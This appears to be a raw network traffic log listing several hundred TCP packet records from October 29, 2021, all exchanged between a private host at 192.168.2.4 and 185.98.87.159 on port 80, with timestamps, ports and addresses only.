Oct 29, 2021 20:50:19.694542885 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694591999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694641113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694643021 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694689989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694739103 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694741011 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.695688009 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.695749998 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.695779085 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.695804119 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.695857048 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.695863008 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.695904970 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.695954084 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.695955992 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696013927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696074963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696090937 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696130037 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696177959 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696181059 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696227074 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696285963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696290016 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696336031 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696386099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696388006 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696443081 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696505070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696511984 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696557999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696609020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696628094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696667910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696726084 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696748018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696790934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696878910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.696886063 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.696948051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697001934 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697001934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697053909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697105885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697108030 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697144032 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697160959 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697212934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697226048 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697268009 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697324038 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697326899 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697385073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697441101 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697458982 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697495937 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697549105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697551012 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697601080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697654009 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697666883 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697710991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697731972 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697767973 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697767973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697819948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697870970 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.697874069 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.697979927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698038101 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698038101 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698091030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698139906 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698149920 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698174953 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698201895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698254108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698259115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698304892 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698355913 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698360920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698409081 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698458910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698465109 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698494911 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698510885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698564053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698569059 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698615074 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698666096 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698668957 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698714018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698719025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698774099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698776007 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.698827028 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.698970079 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699163914 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699218988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699271917 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699285030 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699325085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699377060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699402094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699429035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699485064 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699491024 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699542999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699595928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699610949 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699654102 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699706078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699709892 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699758053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699807882 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699812889 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699857950 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699909925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.699918985 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.699963093 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700014114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700026035 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700067997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700119972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700185061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700221062 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700237989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700242043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700292110 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700341940 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700345039 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700395107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700448036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700448990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700503111 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700556040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700557947 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700608015 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700660944 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700665951 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700719118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700769901 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700773001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700829029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700884104 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.700905085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.700963020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701021910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701046944 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701076031 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701127052 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701133013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701181889 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701232910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701239109 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701284885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701339960 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701608896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701648951 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701679945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701711893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701719046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701741934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701762915 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701771975 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701802969 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701819897 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701833010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701864004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701879025 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701893091 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701922894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701942921 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.701952934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.701982021 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702009916 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.702012062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702043056 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702071905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702102900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702131987 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702163935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702194929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.702672958 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747488976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747529030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747556925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747582912 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747612000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747612953 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747648954 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747654915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747690916 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747718096 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747728109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747754097 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747782946 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747807980 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747827053 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747829914 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747860909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747889042 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747925043 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747950077 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747956991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.747978926 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.747986078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748018026 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748050928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748070955 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748081923 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748100996 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748109102 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748137951 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748159885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748178005 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748188019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748205900 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748217106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748243093 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748266935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748284101 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748291969 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748310089 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748318911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748347998 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748373985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748390913 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748399973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748415947 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748425961 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748449087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748472929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748496056 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748500109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748528004 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.748559952 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.748599052 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751223087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751249075 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751260042 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751379967 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751524925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751543045 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751559019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751580954 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751584053 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751596928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751600981 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751612902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751630068 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751631021 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751646996 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751662970 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751672029 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751678944 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751698017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751701117 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.751713991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.751732111 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754419088 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754442930 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754462957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754483938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754488945 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754503012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754515886 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754523993 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754537106 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754544020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754565001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754586935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754600048 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754606009 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754620075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754626989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754647970 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754686117 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754784107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754807949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754827976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754848003 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754857063 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754869938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754890919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.754890919 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.754925013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755434990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755456924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755477905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755498886 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755518913 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755534887 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755539894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755563974 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755672932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755697012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755716085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755737066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755739927 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755758047 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755758047 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755779982 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755803108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755821943 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755825996 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755844116 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755845070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755867958 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755887985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755906105 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755908012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755928040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755939007 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755949020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755970001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.755971909 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.755995035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756025076 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756037951 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756050110 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756068945 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756069899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756092072 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756113052 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756134033 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756136894 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756155968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756156921 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.756176949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756196976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.756198883 CEST	49855	80	192.168.2.4	185.98.87.159
